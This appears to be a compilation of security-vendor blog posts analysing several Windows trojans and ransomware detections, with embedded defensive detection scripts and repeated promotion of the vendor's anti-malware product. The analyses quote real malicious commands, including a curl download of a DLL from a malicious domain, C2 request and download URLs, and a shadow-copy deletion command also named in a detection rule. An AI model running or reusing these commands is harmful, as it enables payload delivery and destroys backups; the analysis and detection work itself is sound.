The next phase involves the collection of sensitive information. First of all, the malware checks a selection of files that belong to web browsers, looking for passwords, cookies and session tokens. Here is the list of browsers in question:

  • 360Chrome
  • Microsoft Edge
  • 7Star
  • Amigo
  • Brave Browser
  • Citrio
  • CentBrowser
  • Chedot
  • Chromium
  • Orbitum
  • CocCoc Browser
  • Comodo Dragon
  • Coowon
  • Elements Browser
  • Epic Privacy Browser
  • Sleipnir5 (Fenrir Inc)
  • Iridium
  • Kometa
  • ChromePlus (MapleStudio)

As we can see, these locations mainly consist of user data from Chromium-based web browsers. Aside from them, the malware harvests credentials from desktop mail clients and some FTP/VPN applications.

Command & Control Server

The Bearfoos trojan sends HTTP requests to the following addresses to download various files, including a CAB file from the Windows Update server and certificates from Sectigo and Microsoft:

GET http://download.windowsupdate.com/d/msdownload/update/others/2015/05/17930914_a3b333eff1f0428f5a2c87724c542504821cdbd8.cab
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200
GET http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt 200
GET http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt 200

These requests might be attempts to disguise malicious activity as legitimate actions. The malware also resolves DNS names for several domains, including the legitimate download.windowsupdate.com, and potentially suspicious domains such as mail.commtechtrading[.]com and chir104.websitehostserver[.]net. These latter domains could be part of its command-and-control (C2) infrastructure used for data exfiltration. The malware establishes the following TCP/UDP connections with various IP addresses:

TCP 23.53.122.213:80
TCP 173.236.63.6:587
TCP 20.99.133.109:443
TCP 23.216.147.71:80
TCP 23.216.81.152:80
UDP 192.168.0.12:137

After completing the data exfiltration, the malware enters a waiting mode, listening for commands from the C2 server. During this standby period, it continues to collect data, capturing keystrokes, taking screenshots, and recording audio and video from peripheral devices.

Is Trojan:Win32/Bearfoos.B!ml a False Positive?

As I mentioned earlier, the detection of Trojan:Win32/Bearfoos.B!ml is performed by Microsoft Defender’s AI-based system. However, this method is prone to false positives, and legitimate files, such as those associated with recently updated games or programs, are often mistakenly flagged as malicious. In particular, it is common to see false positives in small-batch programs from GitHub, certain emulator apps, and in some bizarre cases even Windows’ own files.

While it is easy to spot a false positive with a program that you know and trust, doing so with a less familiar app may be problematic. If you are not sure about the source and developer, bold guessing may be a particularly destructive practice. That is why a second opinion anti-malware scan is needed.

How to Remove Trojan:Win32/Bearfoos.B!ml?

To remove the Bearfoos.B!ml trojan or check whether it is a real detection, I recommend using GridinSoft Anti-Malware. This program is not vulnerable to malware attacks the way Microsoft Defender is, and it will easily spot even the most recent malware samples thanks to its multi-component detection system. Follow the guide below to get your system as good as new.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:Win32/Znyonm https://gridinsoft.com/blogs/trojanwin32-znyonm-detection/ Thu, 27 Jun 2024 08:52:36 +0000

Trojan:Win32/Znyonm is a detection often seen during backdoor malware activity in the background. Such malware can escalate privileges, enable remote access, or deploy more payloads. Let’s dive into this malicious program, understand how it works, and see how to remove it.

What is Trojan:Win32/Znyonm?

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually the one that uses deep obfuscation and anti-analysis techniques. In particular, this detection name appears with malware like GuLoader, Remcos RAT, and Pikabot. Others can also be seen though, as Microsoft does not attach this detection name to specific malware families, but rather to its properties.

Trojan:Win32/Znyonm detection
Znyonm detection

The primary objectives of Znyonm include facilitating remote access or deploying additional payloads. As a preliminary stage, it establishes persistence within systems, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples found on VirusTotal, I’ve seen the usage of multi-stage loading of code fragments from remote servers via .LNK, VBS, and PowerShell scripts. This allows it to bypass antivirus detection and deliver any malicious payload to the victim’s computer.

Znyonm Trojan Analysis

For the Znyonm sample to analyze, I’ve picked one of the fresh samples of Pikabot. This is a modular backdoor malware that emerged in early 2023. It gained prominence as a substitute for the infamous QakBot and serves as an initial access point in high-profile cyberattacks. Its primary tactics for initial access are spear phishing and thread hijacking. Pikabot deploys exploit kits, ransomware, or other malware tools.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; fraudsters particularly employ thread hijacking to make them look genuine. The format of the attachment may vary – from a PDF document to a ZIP archive that contains the payload. In either case, the email text will try to convince the user to launch the attachment and follow its instructions.

Phishing email screenshot
Typical example of a message that spreads Pikabot. (Source: ANY.RUN)

Another method is malvertising via major ad engines like Google or Facebook. Hackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of checks to avoid analysis, by calling NtQueryInformationProcess. Then, it decrypts the DLL file and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from encrypted parts of the DLL it arrives in. To gain persistence and privileges, Pikabot/Znyonm performs process hollowing.

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

Pikabot malware avoids detection by directly calling the required APIs using their hash for the first 3 APIs. Next, it switches to dynamic API resolution to evade EDR/XDR detection. The malware checks the system language before gathering system information, ceasing execution if one from the ban list is found. After passing the check, it collects system properties to fingerprint the system.

Pikabot code snippet screenshot
Pikabot checks the system language

The fingerprint includes user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of its process. This is a typical set of data for backdoor malware, used to distinguish one system from another. Some backdoors, though, have gained the ability to collect more data over time, getting closer in functionality to spyware.

C2 Communication

The malware sends collected data to the command server using an HTTP POST request over HTTPS protocol. Upon the first contact, the command server sends the response with the command and configuration info. The latter consists of a command-specific code, URL, file address, and the action malware should execute. Some of the commands also require Pikabot to send the results to the C2.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2
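The request above carries several traits a defender can key on: an IP-literal target on an unusual port, a Host header that disagrees with the request line, an Office/Outlook User-Agent talking to a raw IP, and an opaque hex body. The following Python is an added example, not code from the post, that parses a captured request (the sample is constructed after the one shown here, with the body shortened) and returns those indicators:

```python
"""Flag traits of a Pikabot-style C2 beacon in a captured HTTP request (added example)."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample, modelled on the request shown above: the "hxxps" defanging
# is kept and the hex body is shortened.
SAMPLE_REQUEST = """\
POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a4
"""

# Constructed benign request for comparison (a Windows Update download).
BENIGN_REQUEST = """\
GET https://download.windowsupdate.com/example.cab HTTP/1.1
Host: download.windowsupdate.com
User-Agent: Windows-Update-Agent

"""

STANDARD_PORTS = {80, 443}
HEX_BODY = re.compile(r"[0-9a-fA-F]+")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, version, headers and body."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body.strip()}


def _refang(url: str) -> str:
    """Turn a defanged hxxp(s):// scheme back into http(s):// so urlsplit can parse it."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def c2_indicators(req: dict) -> list:
    """Return a sorted list of indicator names that make the request look like a beacon."""
    findings = set()
    parts = urlsplit(_refang(req["target"]))
    host = parts.hostname or ""
    if _is_ip_literal(host):
        findings.add("ip_literal_target")
        if "microsoft office" in req["headers"].get("user-agent", "").lower():
            # Outlook does not post to bare IP addresses; a spoofed UA is a common beacon trait.
            findings.add("office_user_agent_to_raw_ip")
    if parts.port is not None and parts.port not in STANDARD_PORTS:
        findings.add("nonstandard_port")
    host_header = req["headers"].get("host")
    if host_header and parts.netloc and host_header != parts.netloc:
        findings.add("host_header_mismatch")
    if req["method"] == "POST" and HEX_BODY.fullmatch(req["body"]):
        findings.add("opaque_hex_body")
    return sorted(findings)


def triage(raw: str) -> dict:
    """Parse and score a raw request in one call; three or more indicators is suspicious."""
    req = parse_request(raw)
    indicators = c2_indicators(req)
    return {"target": req["target"], "indicators": indicators,
            "suspicious": len(indicators) >= 3}


if __name__ == "__main__":
    for label, raw in (("pikabot", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, triage(raw))
```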

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about a Trojan:Win32/Znyonm detection, an anti-malware scan is needed. As you can see from the analysis above, Znyonm is nothing to mess around with, and can lead to more serious and diverse malware infections. Gridinsoft Anti-Malware will fit perfectly for malware removal.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:Win32/Vigorf.A https://gridinsoft.com/blogs/trojanwin32-vigorf-a-analysis-removal/ Tue, 18 Jun 2024 21:53:27 +0000

Trojan:Win32/Vigorf.A is a generic detection of Microsoft Defender. This detection commonly identifies a running loader malware that may deal significant harm to the system. In this article, let’s find out how dangerous Vigorf.A is and how to get rid of it.

What is Trojan:Win32/Vigorf.A?

Trojan:Win32/Vigorf.A is the detection name that Microsoft Defender attributes to dropper/loader malware. This generic detection name refers to a whole range of malicious programs, rather than one specific family. The goal of Vigorf.A is gaining unauthorized system access and further malware distribution. As my detailed analysis has shown, Trojan:Win32/Vigorf.A uses various methods to bypass antivirus programs and operating system protection.

Trojan:Win32/Vigorf.A detection

Usually, this malware downloads or installs other malicious programs on the computer. It drops its files and modifies system settings and other configuration files to gain persistence. Additionally, it connects to remote servers to send collected information and download additional malicious programs.

Is Trojan:Win32/Vigorf.A False Positive?

False positives with the Vigorf.A name are not a common occurrence. There are only a few cases discussed online, and all of them are related to software that borders on malicious.

False positives
User complaints about false positive detection

The most common case here is game modifiers or patches. Such tools modify game memory or files to unlock features and can be misidentified as Trojan:Win32/Vigorf.A because of their ability to intrude into other programs’ memory. Similar tools and scripts used by software developers can be misidentified as malicious. While such software may be safe and legitimate, it is important to treat it with care.

Vigorf.A Trojan Analysis

Studying the behavior of Trojan:Win32/Vigorf.A sample on an infected system showed me how elaborate these threats can be. Not only does the Trojan collect personal user data, but it also modifies system settings, creating additional vulnerabilities and opening the door for other malware.

Methods of Distribution

Trojan:Win32/Vigorf.A is often spread via spam e-mail campaigns containing malicious attachments or links. Once the user opens the attachment or clicks on the link, the Trojan is installed on their computer, either directly or through the loading script. Despite being used for malware spreading for years now, email spam remains a particularly potent and effective spreading option.

Email spamming example

Malvertising is another tricky method that has been used to spread Trojan:Win32/Vigorf.A as far as my research goes. This malware exploits ad networks to display malicious ads in search engine results. Such ads redirect users to malicious duplicates of familiar sites or directly download malware onto their devices.

Fake Libreoffice ad
Fake LibreOffice ad that tries to mimic the original site’s URL

In addition, Vigorf.A is often hidden in packages containing illegal or pirated software. When a user downloads and installs such programs, the trojan is installed along with them. Such software is often offered for free, which makes it attractive, but it ends up costing more because of the damage the trojan causes.

Launch, Gaining Persistence and Data Collection

After launching in the system, Trojan:Win32/Vigorf.A adds itself to autorun by taking advantage of the Startup folder. This allows it to start automatically every time the system starts. In my case, I found a strange shortcut adxjcv4.lnk, which turned out to be associated with the trojan.

%APPDATA%\microsoft\windows\start menu\programs\startup\adxjcv4.lnk

Alternatively, Vigorf.A may use the DLL hijacking technique. This happens particularly often when malware arrives with the loader, which unpacks the sample and handles the launch. The way to run the malware is nothing unusual – a PowerShell command that runs the malware DLL through the call to rundll32.exe.

rundll32.exe %windir%\system32\advpack.dll

After the launch, the malware checks the system location by its IP address and switches to collecting system data. This gives Vigorf.A the ability to distinguish that particular system from others. This can also be used for more targeted attacks, or to get a rather exhaustive set of victims’ system info to analyze. The malware particularly checks the values of the following keys to get info about programs present on the PC:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count

By checking the next keys, Trojan:Win32/Vigorf.A learns about the devices and networks to which the computer connects and can identify the most vulnerable points for further attacks. This information helps malware operators deploy malware in a more relevant manner, and get extra profit from other systems on the same network.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache\Intranet

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

C2 Communications and Malware Delivery

After collecting all this data, Vigorf encrypts it and sends it to the command server using an HTTP POST request. The list of command servers was predefined for the samples I’ve worked with, but this may differ in other cases. The server, in turn, responds with a blob of data that instructs the malware on further actions. Obviously, for dropper malware, payload delivery is one of the most probable instructions it can get.

To instruct the dropper to deliver malware, the C2 sends the URLs Vigorf should connect to and download it from. It sends HTTP GET requests to the following URLs:

http[:]//185.117.75.198/fiscal/1
http[:]//194.163.43.166/08/st/m.zip

Files downloaded from these addresses were disguised as ordinary documents or incomplete files, making them difficult to detect and analyze. Once Vigorf finishes downloading the malware, it uses system utilities such as wuapp.exe to launch it.

"C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\sHrhJDaCBu\cfg"

How to Remove Trojan:Win32/Vigorf.A?

To remove Trojan:Win32/Vigorf.A, I recommend using GridinSoft Anti-Malware. It will detect and remove Vigorf.A, as well as find other malicious programs downloaded by it. This Anti-Malware can also work with Windows Defender to create an additional line of defense.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

I would also recommend keeping the system and all programs updated to the latest versions to eliminate vulnerabilities that malware can exploit.

Trojan:Win32/Cerber https://gridinsoft.com/blogs/trojan-win32-cerber/ Sat, 15 Jun 2024 07:00:53 +0000

Trojan:Win32/Cerber is a detection name that Microsoft Defender uses to flag ransomware. Its name was once associated with a specific malware family, but as it ceased its activity, this name has been used for a wide range of ransomware samples. It is common to see this malware type in attacks on corporations, though all of them are able to harm individuals to the same degree.

Trojan:Win32/Cerber Overview

Trojan:Win32/Cerber is an older type of malware classified as ransomware. It first appeared in 2016 and quickly became one of the most common types of ransomware. Cerber encrypts files on the infected computer and demands a ransom (usually in Bitcoin) to provide the decryption key. The main spreading way of this malware is phishing emails, but it’s also common to see its loader hidden in pirated software.

Trojan:Win32/Cerber detection screenshot
Trojan:Win32/Cerber detection

As I’ve mentioned in the introduction, the detection name Trojan:Win32/Cerber once referred to a specific ransomware family, Cerber. But after it stopped its activity in 2018, Microsoft started using its name for similar ransomware samples. Usually, those are some small-batch ransomware families that share code similarities with Cerber (or possibly are its direct descendants).

After infecting a victim’s PC, Win32/Cerber performs some basic checks and begins encrypting data. The malware adds its custom extension, which differs from one sample to another; among the examples are “.cerber”, “.ba99”, “.98a0”, “.a37b”, “.a563”, and “.beef”. After finishing the encryption, it drops a ransom note demanding that the victim pay.

One unusual tactic that I’ve seen in Trojan:Win32/Cerber is the use of a voice notification. After the encryption process is complete, each folder with encrypted data contains a ransom note titled #DECRYPT MY FILES#.txt. Additionally, these folders include #DECRYPT MY FILES#.html and #DECRYPT MY FILES#.vbs files. The latter contains a VBScript that, when executed, states the following:

“Attention. Attention. Attention. Your documents, photos, databases and other important files have been encrypted!”

Technical Analysis

Let’s examine how Trojan:Win32/Cerber behaves using a real-world example. As a sample, let’s take one representative of this malware family. This file masquerades as an IObit utility, and even has all the file property fields filled with plausible information.

Cerber Signature info screenshot
Cerber Signature info on the VirusTotal

Upon infiltrating the system, the malware performs specific checks to ensure it’s not running in a virtual environment. The next step involves checking the location of the current system to avoid infecting specific regions.

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\WMIC.exe
\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows\System

To place its files, the Cerber Trojan uses system temporary folders, particularly AppData\Local\Temp. Upon execution, the malware creates its copy in the said folder and directs all the persistence hooks towards this file. Then, the original sample deletes itself, covering its tracks, and requests a system reboot. This looks like a rather organic maneuver considering that the cover for the reviewed sample is a system tuning utility.

Execution

After conducting its checks, the malware begins its primary task: encrypting data. It utilizes legitimate Windows tools, such as the command prompt, to automate actions and conceal traces. It performs the following processes:

C:\Users\\AppData\Local\Temp\Ahpdate.exe
C:\Windows\System32\taskkill.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\System32\schtasks.exe

The first command executes the executable file located in the temporary folder. Then, there are system commands aimed at terminating active processes (such as antivirus software), adding the malware to the Windows scheduler, and initiating certain functions.

Like any ransomware, Cerber invariably deletes shadow copies. This is done to maximize the difficulty of file restoration. To achieve this, the malware executes the following commands:

IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ShadowCopy
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\system32\vssvc.exe
C:\Windows\system32\wbem\wmic.exe shadowcopy delete

In short, Cerber requests access to all objects from the Win32_ShadowCopy class (information about all existing shadow copies) and then proceeds to delete them.
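As an added example (not from the post), the Python below scans constructed process-creation events of the kind Sysmon or an EDR would log and flags the shadow-copy deletion step, rating it higher when the parent process lives in a Temp folder as the Ahpdate.exe copy above does. It also covers the vssadmin variant of the same action, which the post does not show.

```python
"""Detect the shadow-copy deletion that precedes Cerber's encryption (added example)."""
import re
from dataclasses import dataclass

# Constructed process-creation events: timestamp|ParentImage|Image|CommandLine.
# The Temp-resident parent mirrors the Ahpdate.exe copy described in the analysis;
# the vssadmin lines stand for an administrator working from a console.
SAMPLE_EVENTS = r"""
2024-06-15T07:01:02Z|C:\Users\victim\AppData\Local\Temp\Ahpdate.exe|C:\Windows\system32\wbem\wmic.exe|wmic.exe shadowcopy delete
2024-06-15T09:00:00Z|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir
2024-06-15T09:05:00Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin list shadows
2024-06-15T09:06:00Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin delete shadows /all /quiet
"""

# Command-line patterns that remove Volume Shadow Copies (case-insensitive).
RULES = (
    ("wmic_shadowcopy_delete", re.compile(r"\bshadowcopy\s+delete\b", re.IGNORECASE)),
    ("vssadmin_delete_shadows", re.compile(r"\bdelete\s+shadows\b", re.IGNORECASE)),
)

# Parent locations a legitimate backup job never runs from; Cerber's copy sits in Temp.
SUSPICIOUS_PARENT_DIRS = ("\\appdata\\local\\temp\\", "\\programdata\\")


@dataclass
class Alert:
    timestamp: str
    rule: str
    severity: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> dict:
    """Split one pipe-delimited event; the command line may itself contain pipes."""
    timestamp, parent, image, command_line = line.split("|", 3)
    return {"timestamp": timestamp, "parent": parent, "image": image,
            "command_line": command_line}


def _parent_is_suspicious(parent_image: str) -> bool:
    path = parent_image.lower()
    return any(marker in path for marker in SUSPICIOUS_PARENT_DIRS)


def scan_events(events_text: str) -> list:
    """Return one Alert per event whose command line deletes shadow copies."""
    alerts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        for rule_name, pattern in RULES:
            if pattern.search(event["command_line"]):
                severity = "high" if _parent_is_suspicious(event["parent"]) else "medium"
                alerts.append(Alert(event["timestamp"], rule_name, severity,
                                    event["parent"], event["command_line"]))
                break  # one alert per event is enough
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"{alert.timestamp} {alert.severity:6} {alert.rule}: {alert.command_line}")
```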

Is Trojan:Win32/Cerber False Positive?

In most cases, such detections are true, but there are rare instances when Trojan:Win32/Cerber may be a false positive. Surprisingly, this flag pops up on game files installed via Steam or other official platforms. It can happen when a fragment of a legitimate file’s code happens to match a pattern typical for this malware. Typically, when this happens with a legitimate file, updating the signature databases to the latest version resolves the issue.

Trojan:win32.Cerber False Positive
Sometimes Trojan:win32.Cerber may be a False Positive Detection

However, as for mods, add-ons, and game hacks, the situation is different. In this case, the likelihood of getting the Trojan:Win32/Cerber detection is much higher. While the first two are developed by third-party developers and may be distributed through third-party websites, the last one is generally illegal. Embedding malware into hacks, cheats, and game cracks is a common practice among malicious actors.

How To Remove Trojan:Win32/Cerber?

To completely remove Trojan:Win32/Cerber, it’s essential to utilize an advanced anti-malware solution. More importantly, the anti-malware should neutralize ransomware during the download stage; otherwise, it will execute its irreversible actions. I recommend GridinSoft Anti-Malware because its engine can detect most threats, and its Internet Security module blocks potentially malicious websites, significantly reducing the attack surface.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Malware vs Virus https://gridinsoft.com/blogs/malware-vs-virus/ Fri, 31 May 2024 18:41:22 +0000

It is particularly easy to hear people calling the same thing malware or virus. However, while both terms are often used interchangeably, they carry distinct meanings. In this article, I will elucidate the definitions of each term and explain malware vs virus differences.

Malware vs Virus – Is There Any Difference?

The terms malware and virus are often used interchangeably, but technically, they are not the same thing. In a nutshell, malware is a collective term for any type of malicious software, regardless of how it works, its purpose, or how it is distributed. A computer virus, on the other hand, is just one type of malware. Computer viruses have been around almost since the beginning of the Internet: the first self-replicating virus appeared in 1971. Although it did no damage, simply displaying the “I’M THE CREEPER. CATCH ME IF YOU CAN!” text on the screen, it can technically be considered a virus.

Viruses, Worms, and Trojans
Viruses, Worms, and Trojans are the three types of digital infectious agents.

So, all the difference boils down to all viruses being malware, but not all malware being viruses. It’s like calling all copy machines “Xerox” or all portable audio players “Walkman”. Moreover, in addition to the virus category, there are other categories of malware, which in turn are divided into subcategories. We are talking about such categories as worms, trojan horses, rootkits, stealers, spyware, ransomware, adware, etc. Now, we will take a closer look at all of them.

What is Malware?

Malware stands for malicious software, one that aims at damaging the system, files in it, or uploading these files to a remote server. The range and history of malicious software is vast, with changes happening almost every day. Nowadays, malicious software aims almost exclusively at earning money in this or another form. As a result, some analysts classify modern malware as crimeware. Let’s see some of the most widely used malware types.

  • Backdoor
  • Adware
  • Virus
  • Computer Worm

This is not a complete list of threats, but the most widespread malware types. Some of the modern malware samples can possess functions typical for other malware types. For example, a dropper can collect user data, akin to an infostealer, or adware may act as a loader.

What is a Virus?

A computer virus is a type of malicious software. While there are many variations of viruses, they all share the ability to spread through self-replication. Victims activate viruses by opening infected applications or files. Viruses are commonly spread through web applications, software, and email. They can also be transmitted via infected websites, content downloads, and removable media.

The term “virus” has become synonymous with malware due to historical reasons, propagation methods, media popularization, and the broadening of the term to encompass various types of malicious software. Computer viruses have existed since the early days of computing, but “real” viruses began to emerge in the 1980s. The earliest canonical virus is considered to be the Elk Cloner, created in 1982 by high school student Rich Skrenta. It infected Apple II computers and spread via floppy disks. Though harmless, it was the first to spread beyond a single computer system.

Malware and Virus Examples

To summarize, let’s review real representatives of these threats. Here, I have gathered the most prominent examples of different types of threats, along with their properties and their impact on cyberspace:

ILOVEYOU

The ILOVEYOU virus, an email worm, was released in 2000 by two Filipino college students. It quickly spread worldwide through email attachments, deceiving users into opening them. Once opened, the virus overwrote essential system files, leading to computer crashes and data loss. Additionally, it automatically sent copies of itself to every contact in the user’s address book. The global damages caused by this virus were estimated to be around $15 billion.

Emotet

The Emotet Banking Trojan, originating in 2014, was initially developed to steal banking credentials. However, it evolved into a highly modular and sophisticated malware capable of delivering various payloads. It primarily spread through spam emails and quickly became one of the most prevalent and costly forms of malware. Emotet was frequently utilized to distribute ransomware and other malicious software.

WannaCry

The WannaCry Ransomware attack of 2017 exploited a vulnerability in Windows systems to encrypt files and demanded ransom payments in Bitcoin for decryption. It spread rapidly across networks using the SMB protocol, infecting over 230,000 computers in 150 countries. The attack caused widespread disruption, notably affecting the UK’s National Health Service (NHS).

How to Protect Against Malware and Viruses?

To safeguard against malware and viruses, it’s crucial to employ a robust, advanced anti-malware solution. As the cyber threat landscape evolves, so do anti-malware developers. Today, there are numerous high-quality products available, including GridinSoft Anti-Malware. In addition to its primary protection features, it includes an Internet Security module, which has become more of a necessity than an optional add-on. Given that the majority of malware is now propagated via the Internet, I strongly advise utilizing Internet Security for enhanced protection.

Malware vs Virus

Equally important is exercising vigilance while browsing the web. Practicing good cyber hygiene is paramount, which means refraining from clicking on suspicious links or opening email attachments from unknown senders. Adhering to these fundamental rules can significantly decrease the likelihood of falling victim to any of the aforementioned threats.

Trojan:Win32/Mamson.A!ac https://gridinsoft.com/blogs/trojan-win32-mamson-aac/ Wed, 29 May 2024 14:34:04 +0000

Trojan:Win32/Mamson.A!ac is a type of malware designed to gather data from the system it infects. Sometimes, known spyware families get this detection. The malware is typically distributed disguised as helpful utilities that are downloaded from untrustworthy sources.

Trojan:Win32/Mamson.A!ac Overview

Trojan:Win32/Mamson.A!ac is a Microsoft Defender detection that flags infostealer malware. This type of malicious program aims at collecting data from the infected system. Usually, it gathers login credentials from browser files, cookies, browser history, and other information about the victim’s Internet activity. In some cases, samples of RedLine Stealer appear under this detection. Still, the effect is exactly the same.

Trojan:Win32/Mamson.A!ac detection

The Mamson Trojan often spreads under the guise of helpful utilities downloaded from shady websites, including those that distribute hacked software. These places have ideal conditions for malware distribution, as most hacked software requires disabling antivirus software during installation. In certain cases, the malware may hide inside the installer itself.

Technical Analysis

Let’s analyze Trojan:Win32/Mamson.A!ac by tearing down one of its samples. Since this detection is generic, there could be rather wild variations in certain areas, but the “mainstream” functionality remains the same.

Once Mamson enters the system, it checks for a virtual environment, debugging, or sandboxing. For this, it checks the following values in the registry:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Display

These keys keep info about the OS version, language packs, and display settings. Such data is useful both for fingerprinting and to determine whether the environment has anything synthetic about it.

Privilege Escalation

After the first steps, the malware escalates privileges, which gives it a foothold in the system. To begin with, it manipulates the Windows Error Reporting system to legitimize itself.

%windir%\system32\wbem\wmiprvse.exe
%windir%\System32\svchost.exe -k WerSvcGroup
%windir%\system32\WerFault.exe -u -p 2660 -s 684

Further, it creates its own service by issuing a command to the Service Control Manager. This makes Mamson much harder to remove manually, as the service protects its underlying files. Attempting to remove it by hand after such a trick will likely result in a BSOD, unless anti-malware software is used.

C:\Windows\system32\sc.exe start w32time task_started

Defence Evasion

To avoid detection, Mamson comes in a packed (encrypted) form that lets it evade static detection. To legitimize itself, the malware plays with registry keys of the Identity Client Runtime Library (IdentityCRL). Some of the values are also used to keep malware configuration.

HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\001880060ADF5C62
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188006102E98CE

